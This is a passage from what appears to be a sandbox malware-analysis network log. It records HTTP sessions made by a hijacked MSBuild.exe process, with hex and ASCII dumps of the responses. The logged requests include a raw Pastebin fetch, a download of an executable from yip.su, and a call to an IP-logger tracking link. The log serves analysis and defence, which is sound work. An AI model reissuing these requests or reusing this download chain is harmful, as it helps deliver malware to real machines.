6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
2024-09-16 19:21:57 UTC	1369	IN	Data Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
2024-09-16 19:21:57 UTC	1369	IN	Data Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
2024-09-16 19:21:57 UTC	154	IN	Data Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:21:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49756	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:02 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:22:02 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c4339175f7c1831-EWR
2024-09-16 19:22:02 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:22:02 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:22:02 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:22:02 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:22:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49757	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:03 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:22:03 UTC	910	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:22:03 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:22:03 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NuIh4Eaks7wGd%2F8%2Bk7ldFmIVCG%2BITveEsUEvRxe%2B1tcK0T5zzuCwxRMwX0Kkwk8l4U0rqhecq1J4bIi7yWShbVw%2BkZhSrBBdVggAa9aTa3Q%2F%2FH%2F7uprr3Lc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c43391c7983424f-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:22:03 UTC	459	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:22:03 UTC	1369	IN	Data Raw: 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 Data Ascii: revisit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><me
2024-09-16 19:22:03 UTC	1369	IN	Data Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 Data Ascii: ackground-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animat
2024-09-16 19:22:03 UTC	1369	IN	Data Raw: 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 Data Ascii: igator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.ind
2024-09-16 19:22:03 UTC	1369	IN	Data Raw: 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 Data Ascii: script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:au
2024-09-16 19:22:03 UTC	1369	IN	Data Raw: 65 69 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 Data Ascii: eight:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain">
2024-09-16 19:22:03 UTC	166	IN	Data Raw: 6d 28 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: m()),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:22:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49758	104.21.76.57	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:08 UTC	68	OUT	GET /1djqU4 HTTP/1.1 Host: iplogger.com Connection: Keep-Alive
2024-09-16 19:22:08 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Mon, 16 Sep 2024 19:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-09-16 19:22:08 UTC	691	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4e 72 66 6c 6d 44 6e 41 61 68 34 47 6c 49 75 4c 4b 73 2f 4f 6b 66 56 6d 6f 51 6e 74 58 66 31 4d 65 7a 46 75 4a 73 4f 31 4a 69 76 50 31 62 6a 59 35 49 59 36 4d 54 46 77 51 34 38 38 48 51 58 6a 6f 42 62 64 51 74 44 70 52 45 6e 45 4b 33 74 50 42 4b 43 6d 2f 30 79 5a 62 70 4d 67 4e 64 7a 75 6d 6b 48 53 6c 6e 71 55 72 6e 34 3d 24 5a 51 42 54 75 58 4e 79 48 54 58 37 4a 4c 37 36 5a 75 65 62 56 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: NrflmDnAah4GlIuLKs/OkfVmoQntXf1MezFuJsO1JivP1bjY5IY6MTFwQ488HQXjoBbdQtDpREnEK3tPBKCm/0yZbpMgNdzumkHSlnqUrn4=$ZQBTuXNyHTX7JL76ZuebVA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-09-16 19:22:08 UTC	1369	IN	Data Raw: 34 30 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 40ef<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-09-16 19:22:08 UTC	1369	IN	Data Raw: 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 Data Ascii: MSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.theme-dark #challenge-error-text{background-image:url(data:image/svg
